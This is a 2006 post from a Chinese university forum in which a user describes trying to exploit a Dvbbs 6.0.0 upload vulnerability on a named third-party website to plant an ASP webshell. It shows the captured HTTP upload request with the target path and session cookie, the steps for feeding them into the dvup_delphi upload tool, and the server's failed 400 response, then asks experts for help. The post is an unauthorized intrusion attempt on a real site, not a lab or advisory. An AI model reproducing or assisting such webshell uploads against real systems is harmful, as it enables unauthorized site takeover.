碧海潮声大学生网

标题: Dvbbs Version 6.0.0上传漏洞问题！ [打印本页]

---

作者: condor    时间: 2006-5-28 03:07
标题: Dvbbs Version 6.0.0上传漏洞问题！
议题作者：惟一
[讨论]Dvbbs Version 6.0.0上传漏洞问题！
目标网站：http://www.xldz.com/
论坛地址：http://www.xldz.com/XLBBS/
1个Dvbbs Version 6.0.0论坛，记得有个上传漏洞，可以抓包然后上传ASP马
点击发贴然后上传ASP马，肯定是提示类型不对，可是该论坛却是1片空白，如图

没在意，继续……
运行WSockExpert进行抓包

POST /XLBBS/saveannouce_upfile.asp?boardid=12 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://www.xldz.com/XLBBS/saveannounce_upload.asp?boardid=12
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7d62800130146
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon)
Host: www.xldz.com
Content-Length: 91066
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: aspsky=userid=8004&userhidden=2&password=49ba59abbe56e057&userclass=%D0%C2%CA%D6%C9%CF%C2%B7&username=%CE%A9%D2%BB&usercookies=1; BoardList=BoardID=Show; ASPSESSIONIDSSRSABDA=LDNCIJGACHICCMAILNINDMBF

把http://www.xldz.com/XLBBS/saveannouce_upfile.asp?boardid=12放到dvup_delphi的提交地址
cookie是：aspsky=userid=8004&userhidden=2&password=49ba59abbe56e057&userclass=%D0%C2%CA%D6%C9%CF%C2%B7&username=%CE%A9%D2%BB&usercookies=1; BoardList=BoardID=Show; ASPSESSIONIDSSRSABDA=LDNCIJGACHICCMAILNINDMBF
然后上传文件
问题出现了，返回来的信息是：

HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/5.0
Date: Sat, 27 May 2006 11:10:09 GMT
Content-Type: text/html
Content-Length: 87

<html><head><title>Error</title></head><body>The parameter is incorrect. </body></html>

没有提示上传成功啊！

请高手指点

---

欢迎光临 碧海潮声大学生网 (http://www.zjoubbs.com/)

Powered by Discuz! X3.2